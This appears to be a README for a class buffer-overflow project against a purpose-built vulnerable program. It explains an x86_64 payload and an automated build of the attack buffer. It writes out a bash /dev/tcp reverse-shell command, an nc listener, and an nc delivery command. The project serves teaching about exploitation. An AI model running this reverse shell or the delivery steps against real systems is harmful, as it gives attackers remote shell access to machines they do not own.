This project is an extension of a simple buffer overflow exploit example from class. The main goal now was to increase the severity of the payload and to automate and parameterize the exploit. The new vulnerable program (Vuln) now accepts the `-r` flag, which re-execs the process without ASLR to make the exploitation easier. Previously disabling the ASLR had to be done system wide, which is naturally non--ideal. Vuln can either read from a file or from a TCP port with the `-l` flag.

The payload was rewritten in assembly instead of machine code and was ported to x86_64 from i686 architecture and improved upon. Previously the exploit exec'ed a local shell without performing any redirects. Now it execs something along the lines of the following snippet:
```
/bin/bash -c 'bash 0<>/dev/tcp/remote_host/28882 >&0 2>&0'
```
The new payload uses bash's builtin ability to open tcp ports with ease to attach a new bash shell to a remote server, thus making the exploit applicable to remote systems running Vuln.

An attacker can attack Vuln by running something like `nc -l 28882` to wait the exploited Vuln to attach to. Then s/he can run the following to exploit it:

```
make
nc target_host 8080 < buffer
```

The make step will build the vulnerable program, analyse the size of the buffer and where to store the return address on the buffer, and intelligently position the payload in the buffer. Then it will place the prepared attack buffer in the file "buffer". Then nc target_host 8080 will connect to Vuln and deliver the attack. This will exploit Vuln and the exploited Vuln will now connect to remote_host:28882 and start listening for shell commands
